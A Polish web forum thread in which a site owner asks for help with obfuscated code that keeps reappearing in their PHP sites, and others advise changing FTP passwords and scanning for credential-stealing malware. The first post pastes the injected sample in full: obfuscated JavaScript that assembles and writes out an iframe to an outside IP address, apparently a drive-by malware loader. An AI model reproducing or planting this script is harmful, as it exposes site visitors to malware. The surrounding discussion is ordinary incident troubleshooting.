Krzaki, virusy, pomocy

0

Witam a wręcz błagam wszystkich o pomoc.
Od 3 dni na moich 2 stronach (napisane PHP i Smarty) są dopisywane jakieś dziwne kody na początku lub na końcu strony. Co je usunę to one po jakimś czasie wracają...
Dochodzę do wniosku ze mam jakiegoś syfa na swoim kompie i to on coś świruje mi na ftp. No ale np. wczoraj komp był wyłączony a wpis się dopisał. Przeskanowałem całego kompa Nod32, Mksvir online, Spybotem i tylko Spybot wykrył 3 pliczki usunąłem... ale czy to pomoże?

[b]Błagam was jeśli ktoś miał podobny problem to proszę o pomoc![/b]

Podaje przykładowe dwa kody tych wpisów:
[code]

<script>osoem=(4e0,190);

johbc=(9e0,1909);
arnrb=(65.,""+"a"+"m"+"e");
vpkgs=(0x826," ");
oymzl=(1.89e2<=656?"":5.);
oozuk=(0x44>6?"17":2.934e3);
aivuk=(4e0,""+".");
rjreh=(5.4e1>0.3?"":.5);
mnswd=(414>6.17e3?70.:"9");
zlits=(5.5e1>1.5e1?".":46.);
wlpwa=(9,"93");
dmdcw=(1e1<.6495?278.:"las");
bthvu=(0.900,"r");
xwjcg=(0x4,"yl");
wxvoe=(0.64<=0.1?.9:""+"i"+"s"+"");
wafzv=(646>8.39e2?9518:"i");
jfazq=(0x685>=8e1?""+"b"+"i"+"l"+"":4.3e1);
ernzk=(.840>=2.?53.:"i"+"t"+"y"+"");
yfnul=(8.51e2,":");
skxws=(.448,"");
vyrje=(0x6,"<");
kylrc=(59,"/i");
zllcn=(8483,""+"a"+"");
oxynx=(9.6e1,""+"m"+"e"+"");
elbis=(0x66<2002?"r":0x547);
slnat=(7.07e2,"");
onlvz=(9e0<0x54?"='":58);
bljji=(6.,"ht");
oowax=(9.3e1<=4?835.:"tp");
vafut=(93>634.?6157.:":/");
hswsd=(.3>=6.?33.:"");
bwtwu=(0.9,"o");
efesv=(0.8,"/");
nczim=(8166>=3.495e3?"=":0.7);
kkkka=(0x93,"2");
btqpy=(.6," ");
yxjvl=(9.,""+"");
myfsk=(7,"");
qcevo=(0x2<.350?.4:"h");
lmiph=(.1055>=0.92?0.8:"i");
fgjfd=(329,"d");
onjpi=(9.84e2<=854.?0.7687:"e");
ypdfc=(0.65<=42.?" "+"":.8318);
claug=(0x3590,">");
lpcpn=(7.7e1,"");
nhbvb=(2,""+">");
flrft=(0x9,5);
irhwk=((93<=9893?.711:3)<=(0.9>=9.4e1?.569:3.692e3)?(.3<=1.2e1?osoem:2.21e2):(4.>.3?.6:0.31));
fyatw=((973.,0.5e1)<(3928.,.7689)?(5<=.532?.696:2e0):(5e0,johbc));
nwyro=((7e0>=8.?3869.:0x2),(5.91e2>=0.957e3?0x2110:arnrb)+(0.5e1,vpkgs)+(.830>=9.8e1?.533:oymzl));
xwuua=((7e0>=82.?.9357:7.),(1983.>=20.?"85"+"."+"":8352)+(6.35e2<0x2?0x83:oozuk)+(1.2e1>0x4843?56:aivuk));
kzxos=((.3727,5.06e2),(.727,rjreh)+(91,"1"+"3")+(6849.,mnswd)+(15.,zlits)+(4>.336?""+"1"+"":.2)+(0.68,wlpwa)+(.79,"/")+(.136,dmdcw)+(0x4<.5?.4:"the")+(6,bthvu)+(2.,""));
kxotj=((3.08e2,0.7310),(0x2,xwjcg)+(7e0<=7.269e3?"e=":5.106e3)+(2.,""+"'"+"v"+"")+(0x4<6e0?wxvoe:0x7616)+(.9511<=0x5251?wafzv:0.1902)+(2.807e3>2.1e1?jfazq:0x2)+(5588.>=2.?ernzk:8.11e2)+(781>=0.2435?yfnul:67)+(.82,skxws));
xynhe=((.58,1.266e3),(33>0x32?0x4312:vyrje)+(.6084<=957?kylrc:0x2769)+(0.63,"fr")+(2e0,zllcn)+(6.,oxynx)+(426,""));

aaa=(((61>=0.7?4870:178)>=(3.78e2>=0x5?7.709e3:6.427e3)?(0x1985,9389):(6e0,.825)),((0.229e3>=69.?4.562e3:3132)<=(66<=0x3?7e0:0x229)?(5217.,5e0):(376.>7.86e2?6.5e1:document)))(((.82,0x6)<=(8130,.7246)?(4.7e1<.551?2:0.991):(0x9688>=781.?0.31:5.04e2)),((7.1e1>=.1?.29:3.8e2),(382,"w")+(9865>=.2?elbis:13)+(.152>=0x452?0.363:""+"it"+"")+(5.<=8.1e1?"e":0x35)));
</script>
[/code]

0

Jak można skrypt PHP antywirusem skanować? Co to były za pliczki?

0

Zmien haslo do FTP.

0
Demonical Monk napisał(a)

Jak można skrypt PHP antywirusem skanować? Co to były za pliczki?
E nie skrypt tylko całego mojego kompa. Bo może u mnie coś siedzi i pobiera hasła do ftp lub coś

reichel napisał(a)

Zmien haslo do FTP.
Pomoże? Czy to tylko chwilowe rozwiązanie?

0

A <ort>z kąd </ort>mamy wiedzieć? Nie wiadomo czy to jakiś skrypt to dokleja, czy to serwer taki, czy może coś ci kradnie hasła do FTP (najmniej prawdopodobne)

0

Swojego czasu mialem robaka co zwijal hasla do ftp'a z totalcommander i pozniej mialem doklejone bzdety do index html (ale na szczesnie i tak byly od razu omijane). Pytajac adminow hostingow w ktorych mialem wykupione uslugi powiedzieli ze zdarza sie to nawet dosc czesto (coz niesmiertelny IE, przez niego ...). Rozwiazanie zmiana hasla oraz wyczyszczenie kompa antywirem. Moze cos z zewnatrz doklejac a nie z twojego kompa jak juz zna haslo (tak bylo w moim przypadku, IP nie bylo moje).

1 użytkowników online, w tym zalogowanych: 0, gości: 1